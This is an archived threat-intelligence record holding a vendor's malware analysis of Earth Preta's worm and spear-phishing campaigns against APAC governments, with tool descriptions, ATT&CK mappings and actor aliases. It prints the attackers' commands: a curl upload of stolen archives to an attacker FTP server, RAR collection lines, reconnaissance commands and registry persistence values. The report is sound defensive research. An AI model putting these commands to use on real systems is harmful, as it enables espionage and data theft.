{ "id": "9c4d94b8-7350-462a-8689-77b9d9a651b5", "created_at": "2026-04-06T00:14:49.483075Z", "updated_at": "2026-04-10T13:12:37.360719Z", "deleted_at": null, "sha1_hash": "a8a60442237f5031be077576a1209257d3445fcd", "title": "Earth Preta Evolves its Attacks with New Malware and Strategies", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 13280139, "plain_text": "Earth Preta Evolves its Attacks with New Malware and Strategies\r\nBy By: Lenart Bermejo, Sunny Lu, Ted Lee Sep 09, 2024 Read time: 11 min (2847 words)\r\nPublished: 2024-09-09 · Archived: 2026-04-05 15:27:12 UTC\r\nMalware\r\nIn this blog entry, we discuss our analysis of Earth Preta’s enhancements in their attacks by introducing new tools,\r\nmalware variants and strategies to their worm-based attacks and their time-sensitive spear-phishing campaign.\r\n \r\nSummary\r\nEarth Preta has upgraded its attacks, which now include the propagation of PUBLOAD via a variant of the\r\nworm HIUPAN.\r\nAdditional tools, such as FDMTP and PTSOCKET, were used to extend Earth Preta’s control and data\r\nexfiltration capabilities.\r\nAnother campaign involved spear-phishing emails with multi-stage downloaders like DOWNBAIT and\r\nPULLBAIT, leading to further malware deployments.\r\nEarth Preta’s attacks are highly targeted and time-sensitive, often involving rapid deployment and data\r\nexfiltration, with a focus on specific countries and sectors within the APAC region.\r\nEarth Preta has been known to launch campaigns against valued targets in the Asia-Pacific (APAC). Our recent\r\nobservations on their attacks against various government entities in the region show that the threat group has\r\nupdated their malware and strategies.\r\nWorm-based Attack Progression\r\nEarth Preta employed a variant of the worm HIUPAN to propagate PUBLOAD into their targets' networks via\r\nremovable drives. PUBLOAD was used as the main control tool for most of the campaign and to perform various\r\ntasks, including the execution of tools such as RAR for collection and curl for data exfiltration.\r\nPUBLOAD was also used to introduce supplemental tools into the targets' environment, such as FDMTP to serve\r\nas a secondary control tool, which was observed to perform similar tasks as that of PUBLOAD; and PTSOCKET,\r\na tool used as an alternative exfiltration option. A short attack overview can be seen in Figure 1.\r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 1 of 20\n\nFigure 1. Attack chain\r\nInitial Access and Propagation\r\nIt was established that PUBLOAD is among the first-stage control tools deployed by Earth Preta.  While spear-phishing emails were previously used to deliver PUBLOAD, it has been recently observed that a version of\r\nPUBLOAD is delivered via a variant of HIUPAN propagating through removable drives (Figure 2). This HIUPAN\r\nvariant has differences with the previously documented variant, which was used to propagate ACNSHELL,\r\nalthough its main utility within the attack chain stays the same.\r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 2 of 20\n\nFigure 2. Overview of HIUPAN\r\nThis variant is easier to configure, as it has an external config file that has basic information for its propagation\r\nand watchdog function (Figure 3).\r\nFigure 3. HIUPAN configuration\r\nHIUPAN’s configuration has two main components: one decimal value and the rest being a list of filenames that\r\nHIUPAN will spread with it when it propagates (Table 1). The decimal value serves as the watcher function’s\r\nsleep multiplier (decimal value * 0x3e8 = sleep time) and determines the sleep timer before the watcher function\r\nperforms its check again.\r\nType Value Purpose\r\nDecimal Value 10 Watcher sleep multiplier\r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 3 of 20\n\nFilenames\r\nUsbConfig.exe HIUPAN Host for dll side-loading\r\nu2ec.dll HIUPAN malware\r\nWCBrowserWatcher.exe PUBLOAD Host for dll side-loading\r\ncoccocpdate.dll PUBLOAD loader\r\nCocBox.zip PUBLOAD encrypted component\r\n$.ini HIUPAN configuration file\r\nTable 1. Example of HIUPAN configuration values\r\nHIUPAN Installation\r\nHIUPAN will install its copy and copies of files that are listed in its configuration file (in this case, a PUBLOAD\r\ninstallation set) to C:\\ProgramData\\Intel\\_\\. It will also create an autorun registry for its installed copy:\r\n[HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]\r\nUsbConfig = C:\\ProgramData\\Intel\\_\\UsbConfig.exe\r\nHIUPAN will also modify the values of the following registry entries to hide it and its accompanying malware’s\r\npresence. These values will also be checked every time HIUPAN executes:\r\n[HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced]\r\nShowSuperHidden = 0\r\nHidden = 2\r\nHideFileExt = 1\r\nWatcher Function and Propagation\r\nOnce launched from its install directory, HIUPAN will launch its watcher function, which will periodically check\r\nif there are removable and hot-pluggable drives plugged into the infected machine (Figure 4). If one is available, it\r\nwill propagate to the removable drive by storing its copy, copies of files listed in its configuration, and its\r\nconfiguration file to a storage directory named \u003cremovable drive\u003e:\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\_\\ (Figure 5).\r\nHIUPAN will also add another copy of its host file (USBConfig.exe) and main worm component (u2ec.dll) into\r\nthe root directory of the removable drive (Figure 5). It will then move all files and directories to \u003cremovable\r\ndrive\u003e:\\_\\ to let USBconfig.exe remain the only visible file when an unsuspecting user plugs in and opens the\r\nremovable drive, baiting them into clicking it an unknowingly spreading the worm into a new environment. \r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 4 of 20\n\nFigure 4. Creates a list of qualified drives for propagation\r\nFigure 5. HIUPAN spreading to removable drives\r\nThe same watcher function will also periodically check and make sure that the PUBLOAD host process is running\r\n(WCBrowserWatcher.exe) and will launch it from the install directory if it is not, as shown in Figure 6.\r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 5 of 20\n\nFigure 6. HIUPAN watcher for PUBLOAD\r\nNetwork Discovery, Persistence and Control\r\nPUBLOAD\r\nWhile HIUPAN facilitates propagation via removable drives, PUBLOAD has been observed to perform initial\r\nsystem info collection to map out the current network.\r\nPUBLOAD’s tactics, techniques, and procedures (TTPs) remain mostly like those of the previously documented\r\nvariant used in Earth Preta’s previous spear-phishing campaign against governments. The variant propagated by\r\nHIUPAN uses C:\\ProgramData\\CocCocBrowser\\ as its install path, as it uses CocCocUpdate.exe as its DLL side-loading host, a browser application popular in Vietnam. PUBLOAD has its own installation routine, which\r\nincludes copying all components to its install path and creating autorun registry entry and a scheduled task (Figure\r\n7).\r\nFigure 7. PUBLOAD install command\r\nTo map the network, the following commands will be executed in sequence and in very short intervals via cmd:\r\nhostname\r\narp  -a\r\nwhoami\r\nipconfig  /all\r\nnetstat  -ano\r\nsysteminfo\r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 6 of 20\n\nWMIC  /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName\r\n/Format:List\r\nwmic  startup get command,caption\r\ncurl  http://myip.ipip.net\r\nnetsh  wlan show interface\r\nnetsh  wlan show networks\r\nnetsh  wlan show profiles\r\nwmic  logicaldisk get caption,description,providername\r\ntasklist\r\ntracert  -h 5 -4 google.com\r\nreg  query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nreg  query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nPUBLOAD also facilitates the delivery of additional tools into the compromised system. In this specific attack\r\nchain, PUPLOAD has delivered FDMTP as a secondary control tool and PTSOCKET for exfiltration to some\r\ninfected systems.\r\nFDMTP\r\nFDMTP is a newly found hacktool used by Earth Preta. It is a simple malware downloader implemented based on\r\nTouchSocket over Duplex Message Transport Protocol (DMTP).\r\n In the recent campaign, threat actors embedded the FDMTP in the data section of a DLL (Figure 8).  Then, it can\r\nbe launched through DLL side-loading. To enhance malware security for defense evasion, the embedded network\r\nconfigurations are encoded and encrypted via Base64 and DES (Figures 9 and 10). \r\nFigure 8. Main function of FDMTP\r\nFigure 9. Encrypted configuration and DES key\r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 7 of 20\n\nFigure 10. Decrypted configuration\r\nCollection and Exfiltration\r\nCollection of data is done regularly using RAR, targeting files (.doc, .docx, .xls, .xlsx, .pdf, .ppt, .pptx) modified\r\nat specified cutoff dates. Exfiltration is performed using different methods: The most common one is using cURL\r\nto upload the archived files to an attacker-owned FTP site, with updated credentials. PUBLOAD’s collection\r\nactivity via RAR can be observed as follows:\r\nC:\\Progra~1\\WinRAR\\Rar.exe a -r -tk -ta\u003ccutoff date/datetime\u003e -n*.doc* -n*.docx* -n.xls* -n*.pdf* -\r\nn*.ppt* -n*.pptx* -n*.txt* C:\\programata\\IDM\\\u003cmachine name-\u003croot drive of target collection\r\ndirectories\u003e.rar \u003cstart directory ir riit drive for collection\u003e\r\nPUBLOAD also performs exfiltration via cURL, by sending the archived data to an attacker-owned FTP site:\r\ncurl --progress-bar -C --T C:\\programdata\\IDM\\\u003carchive name\u003e.RAR ftp://\u003cftp username\u003e:\u003cftp\r\npassword\u003e@\u003cPUBLOAD ftp server\u003e    \r\nThe first instance of collection and exfiltration commands executed by PUBLOAD is also part of its command\r\nsequence mentioned in the lateral movement section above, with time intervals less than a minute.\r\nAn alternative method of exfiltration is by using PTSOCKET, which is a customized file transfer tool\r\nimplemented based on TouchSocket over DMTP (Figure 11). According to arguments, PTSOCKET can be used to\r\ntransfer files in multi-thread mode. In the recent campaign, it was used as exfiltration tool to upload the collected\r\ndata onto the remote server (Figure 12).\r\nFigure 11. File transfer function of PTSOCKET\r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 8 of 20\n\nUsage:\r\n{PTSOCKET} -h [host]:[port] -p [uploaded file path] -s [saved file path] -t [num of thread]\r\nFigure 12. Exfiltration via PTSOCKET\r\nSpear-phishing Attack Progression\r\nEarth Preta has initiated a fast-paced spear-phishing campaign we started to observe in June. As shown in Figure\r\n13, this campaign made use of a spear-phishing email with an attached .url file that will download a downloader\r\nnamed DOWNBAIT, which will download a decoy document. Based on our telemetry, we can expect that the\r\nemails’ contents are related to the decoy document. This will continue the chain of infection with PULLBAIT to\r\nload CBROVER, which will then be used to deliver PLUGX. Collection will be performed via RAR and a tool\r\nnamed FILESAC. Stolen information will be sent to an attacker-controlled infrastructure using a currently\r\nunknown tool. Based on our telemetry, the information may be sent to an attacker-controlled cloud service.\r\nFigure 13. Spear-phishing attack flow\r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 9 of 20\n\nDelivery\r\nA spear-phishing email containing a .url attachment is sent to unsuspecting victims. This leads to the download\r\nand execution of DOWNBAIT, a signed downloader and loader tool used to download PULLBAIT, leading to the\r\ndownload and execution of CBROVER.\r\nDOWNBAIT and PULLBAIT\r\nDOWNBAIT is a first-stage downloader meant to download the decoy document and a downloader shellcode\r\ncomponent. DOWNBAIT is a digitally signed tool (Figure 14); this is an attribute that can add to its evasiveness\r\nor bypass other security measures that check for digital signatures before allowing execution of applications.\r\nFigure 14. Signature of DOWNBAIT\r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 10 of 20\n\nDOWNBAIT codes are encrypted with a multi-layered XOR and will be decrypted upon execution (Figure 15).\r\nFigure 15. Decryption of DOWNBAIT code\r\nDOWNBAIT downloads and executes the decoy document from an attacker-controlled server (Figure 16). From\r\nthe same server, it will also download the PULLBAIT shellcode and execute it in memory (Figure 17).\r\nFigure 16. Download and execute decoy document\r\nFigure 17. Download and execute PULLBAIT into memory\r\nPULLBAIT is a straightforward shellcode which will perform further download and execution. In the observed\r\ncampaign, PULLBAIT will download and execute CBROVER, the first-stage backdoor (Figure 18).\r\nFigure 18. PULLBAIT downloads and executes CBROVER\r\nThe spear-phishing email and the .url attachment is tailored based on the targets and are paired with the decoy\r\ndocuments. Up until this point, all tools and components are downloaded from an attacker-controller webdav\r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 11 of 20\n\nserver hosted in 16[.]162[.]188[.]93.\r\nNetwork Discovery, Persistence, and Control\r\nCBROVER and PLUGX\r\nCBROVER is a backdoor that supports file download and remote shell execution. It’s spawned by using DLL\r\nside-loading techniques (Figure 19). \r\nFigure 19. CBROVER spawned via DLL side-loading\r\nThrough CBROVER, the first PLUGX components (Table 2) were deployed to target the machine and launched\r\nthough DLL side-loading techniques (Figure 20).\r\nFile name Description\r\nkmrefresh.exe Legitimate executable used to load coreglobconfig.dll\r\ncoreglobconfig.dll Malicious loader used to execute PLUGX (glob.dat)\r\nglob.dat Encrypted PLUGX\r\nTable 2. List of the first PLUGX components deployed through CBROVER\r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 12 of 20\n\nFigure 20. First PLUGX components (kmrefresh.exe) deployed and executed through CBROVER\r\n(Edge.exe)\r\nAfter checking the components, the deployed PLUGX variant is same as the general type of PLUGX which was\r\nused by Earth Preta in previous DOPLUGS campaigns.\r\nAfterward, a file collector, tracked as FILESAC was deployed into the compromised machine and started to\r\ncollect victim’s files (Figure 21). The details about the FILESAC are discussed in the “Collection and\r\nExfiltration” section of this blog entry.\r\nFigure 21. PLUGX components(kmrefresh.exe) injected into dllhost.exe and drop the FILESAC\r\n(FileServer0501.exe) for data collection\r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 13 of 20\n\nIt’s worth noting that there would be second-stage PLUGX components (shown in Table 3) through prior PLUGX\r\nafter initial PLUGX installation. Compared to first-stage PLUGX, the second-stage PLUGX shellcode was\r\nprotected by using RC4 and Data Protection API (DPAPI), which relies on keys tied to specific user accounts on\r\nspecific machines. The execution of those environmentally keyed payloads is constrained to a specific target\r\nenvironment and poses a challenge on follow-up malware analysis.\r\nFile name Description\r\nCanonlog.exe Legitimate executable used to load coreglobconfig.dll\r\nceiinfolog.dll Malicious loader used to execute PLUGX (cannon.dat)\r\ncannon.dat Second-stage PLUGX.  (Encrypted by RC4 and DPAPI)\r\nTable 3. List of second-stage PLUGX components\r\nCollection and Exfiltration\r\nCollection has been observed to be performed in two ways:  \r\nThe first method is via RAR, which is launched by PLUGX via command line: \r\n\"RAR.exe  a -r -m3  -tk -ed -dh -v4500m -hp\u003carchive password\u003e -ibck -ta\u003ccutoff date\u003e -n*.doc* -n*.rtf* -\r\nn*.xls* -n*.pdf* -n*.ppt* -n*.jpg* -n*.cdr* -n*.dwg* -n*.png* -n*.psd* -n*.JPE* -n*.BMP* -n*.TIF* -\r\nn*.dib* \\\"\u003ccollection storage path\u003e\\\\\u003carchive name\u003e.RAR\\\" \\\"\u003ctarget path for collection\u003e\"\" \r\nThe second method is by USING FILESAC, a configurable tool, which will be downloaded and launched\r\nby PLUGX. It’s implemented based on an open-source tool, “FileSearchAndCompress” and its\r\nconfiguration was embedded in the tools as follows: \r\nTarget file types: doc|docx|xls|xlsx|ppt|pptx|pdf|jpg|cdr|dwg \r\nTarget time: 2024-05-01 ~ 2024-12-31 \r\nIn our telemetry, we have observed that collected documents are exfiltrated using a currently unknown tool. Based\r\non what we observed, the tool accepts the archive filename as its argument, and upon inspecting generated\r\nnetwork traffic, The tool connects to several IP addresses that are related to Microsoft’s cloud services, which\r\ninclude identity platform for token exchange, Graph API host server, and OneDrive-related ones.\r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 14 of 20\n\nFigure 22. Tool outbound connections after being launched by PLUGX\r\nThis kind of traffic implies the tool is using a refresh token, connect to the identity exchange platform to exchange\r\nit for an authentication token to then interact with a cloud service (implied to be OneDrive) using Graph API.\r\nOther Observations on 16[.]162[.]188[.]93\r\nDuring our inspection of the download site at IP address 16[.]162[.]188[.]93, we discovered that it hosts a\r\nWebDAV server (Figure 23). This server contains numerous decoy documents, along with various malware\r\nsamples, including DOWNBAIT, PULLBAIT, and CBOROVER. \r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 15 of 20\n\nFigure 23. The file server of 16[.]162[.]188[.]93\r\nInside the folder “/1”, the malware PULLBAIT and CBROVER are located, and in the folder “/projects” there are\r\ntwo subfolders which are “/documents” and “/done”. The archived DOWNBAIT is stored in the folder “/done”,\r\nwhile the decoy documents are found in the folder “/documents” (Figure 24).\r\nAll the subfolders within these two directories are named after the dates they were created. The earliest created\r\nfolder is “2024-06-5” and the latest one is “2024-07-11”. Since the files within the date-named folders are deleted\r\nafter around one day, we believe that the actions targeting specific victims are executed very quickly, within a\r\nsingle day.\r\nFigure 24. The subfolders in ”/projects/documents/”\r\nBased on the filenames and content of the decoy documents, we can potentially identify their targets. The\r\ncountries that were likely targeted include Myanmar, the Philippines, Vietnam, Singapore, Cambodia and Taiwan,\r\nall located in the APAC region. Additionally, the decoy documents predominantly focus on topics related to\r\ngovernment, particularly foreign affairs (Figures 25 and 26). \r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 16 of 20\n\nFigure 25. Decoy document from Communist Party in Vietnam\r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 17 of 20\n\nFigure 26. Decoy invitation to the 2024 Global Leadership Program\r\nConclusion\r\nEarth Preta has shown significant advancements in their malware deployment and strategies, particularly in their\r\ncampaigns targeting government entities, which include those in the military, police, foreign affair agencies,\r\nwelfare, the executive branch, and education in the APAC region.\r\nThe group has evolved their tactics, notably with sophisticated malware variants like HIUPAN and its ability to\r\npropagate via removable drives, which allow it to quickly deliver PUBLOAD; and the introduction of new tools\r\nlike FDMTP and PTSOCKET to enhance their control and exfiltration capabilities.\r\nAdditionally, the recent fast-paced spear-phishing campaigns we observed in June demonstrate their adaptability,\r\nleveraging multi-stage downloaders (from DOWNBAIT to PLUGX) and possibly exploiting Microsoft's cloud\r\nservices for data exfiltration. The quick turnover of decoy documents and malware samples on the WebDAV\r\nserver hosted at 16[.]162[.]188[.]93 suggests that Earth Preta is executing highly targeted and time-sensitive\r\noperations, focusing on specific countries and industries within APAC region. Earth Preta has remained highly\r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 18 of 20\n\nactive in APAC and will likely remain active in the foreseeable future. This evolving threat landscape highlights\r\nthe need for continuous vigilance and updated defensive measures to counteract Earth Preta's sophisticated and\r\nadaptive techniques.\r\nMITRE ATT\u0026CK\r\nTactic Technique ID Description\r\nInitial Access\r\nReplication Through Removable\r\nMedia\r\nT1091\r\nHIUPAN spreads through removable\r\ndrives to deliver PUBLOAD\r\nPhishing: Spearphishing\r\nAttachment\r\nT1566.001\r\nUses Spearphishing email to gain access\r\nto targets’ systems\r\nPersistence\r\nBoot or Logon Autostart\r\nExecution: Registry Run Keys /\r\nStartup Folder\r\nT1547.00 Uses Registry Run keys for persistence\r\nScheduled Task/Job: Scheduled\r\nTask\r\nT1053.005 Uses Scheduled task for persistence\r\nDefense\r\nEvasion\r\nHijack Execution Flow: DLL\r\nSide-Loading\r\nT1574.002\r\nSeveral of the malwares are loaded\r\nusing DLL Side-Loading\r\nExecution Guardrails:\r\nEnvironmental Keying\r\nT1480.001\r\nSecond stage PLUGX payload is\r\nprotected with RC4 and DPAPI\r\nSubvert Trust Controls: Code\r\nSigning\r\nT1553.002 DOWNBAIT are digitally signed\r\nProcess Injection T1055\r\nPLUGX will inject its codes to other\r\nprocess launched process with varying\r\narguments\r\nDiscovery\r\nSystem Information Discovery T1082\r\nCommands such as hostname and\r\nsysteminfo are used to perform System\r\nInformation Discovery\r\nSoftware Discovery: Security\r\nSoftware Discovery\r\nT1518.001\r\nWmic is used to discover installed AV\r\nproducts\r\nSystem Network Connections\r\nDiscovery\r\nT1049\r\nNetstat is used to discover network\r\nconnections\r\nSystem Network Configuration\r\nDiscovery\r\nT1016\r\nCommands like ipconfig and netsh are\r\nused to discover network configuration\r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 19 of 20\n\nCollection Data from Local System T1005\r\nFILESAC is used to search for specific\r\nfile types of interest within the system\r\n \r\nArchive Collected Data: Archive\r\nvia Utility\r\nT1560.001\r\nUse of WinRAR or FILESAC to archive\r\ncollected data\r\nExfiltration\r\nExfiltration Over Web Service:\r\nExfiltration to Cloud Storage\r\nT1567.002\r\nTelemetry information suggests possible\r\nexfiltration to a cloud service\r\n \r\nExfiltration Over Alternative\r\nProtocol\r\nT1048\r\nData are exfiltrated to attacker-controlled servers using cURL or\r\nPTSOCKET\r\nCommand and\r\nControl\r\nApplication Layer Protocol:\r\nWeb Protocols\r\nT1071.001\r\nDownloaders and Backdoors\r\ncommunicate with C\u0026C using\r\nHTTP/HTTPS\r\nIndicators of Compromise (IOCs)\r\nThe full list of IOCs can be found here.\r\nTags\r\nSource: https://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nhttps://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.trendmicro.com/en_in/research/24/i/earth-preta-new-malware-and-strategies.html" ], "report_names": [ "earth-preta-new-malware-and-strategies.html" ], "threat_actors": [ { "id": "b69037ec-2605-4de4-bb32-a20d780a8406", "created_at": "2023-01-06T13:46:38.790766Z", "updated_at": "2026-04-10T02:00:03.101635Z", "deleted_at": null, "main_name": "MUSTANG PANDA", "aliases": [ "Stately Taurus", "LuminousMoth", "TANTALUM", "Twill Typhoon", "TEMP.HEX", "Earth Preta", "Polaris", "BRONZE PRESIDENT", "HoneyMyte", "Red Lich", "TA416" ], "source_name": "MISPGALAXY:MUSTANG PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f9806b99-e392-46f1-9c13-885e376b239f", "created_at": "2023-01-06T13:46:39.431871Z", "updated_at": "2026-04-10T02:00:03.325163Z", "deleted_at": null, "main_name": "Watchdog", "aliases": [ "Thief Libra" ], "source_name": "MISPGALAXY:Watchdog", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6daadf00-952c-408a-89be-aa490d891743", "created_at": "2025-08-07T02:03:24.654882Z", "updated_at": "2026-04-10T02:00:03.645565Z", "deleted_at": null, "main_name": "BRONZE PRESIDENT", "aliases": [ "Earth Preta ", "HoneyMyte ", "Mustang Panda ", "Red Delta ", "Red Lich ", "Stately Taurus ", "TA416 ", "Temp.Hex ", "Twill Typhoon " ], "source_name": "Secureworks:BRONZE PRESIDENT", "tools": [ "BlueShell", "China Chopper", "Claimloader", "Cobalt Strike", "HIUPAN", "ORat", "PTSOCKET", "PUBLOAD", "PlugX", "RCSession", "TONESHELL", "TinyNote" ], "source_id": "Secureworks", "reports": null }, { "id": "9baa7519-772a-4862-b412-6f0463691b89", "created_at": "2022-10-25T15:50:23.354429Z", "updated_at": "2026-04-10T02:00:05.310361Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Mustang Panda", "TA416", "RedDelta", "BRONZE PRESIDENT", "STATELY TAURUS", "FIREANT", "CAMARO DRAGON", "EARTH PRETA", "HIVE0154", "TWILL TYPHOON", "TANTALUM", "LUMINOUS MOTH", "UNC6384", "TEMP.Hex", "Red Lich" ], "source_name": "MITRE:Mustang Panda", "tools": [ "CANONSTAGER", "STATICPLUGIN", "ShadowPad", "TONESHELL", "Cobalt Strike", "HIUPAN", "Impacket", "SplatCloak", "PAKLOG", "Wevtutil", "AdFind", "CLAIMLOADER", "Mimikatz", "PUBLOAD", "StarProxy", "CorKLOG", "RCSession", "NBTscan", "PoisonIvy", "SplatDropper", "China Chopper", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-10T02:00:04.776949Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434489, "ts_updated_at": 1775826757, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a8a60442237f5031be077576a1209257d3445fcd.pdf", "text": "https://archive.orkl.eu/a8a60442237f5031be077576a1209257d3445fcd.txt", "img": "https://archive.orkl.eu/a8a60442237f5031be077576a1209257d3445fcd.jpg" } }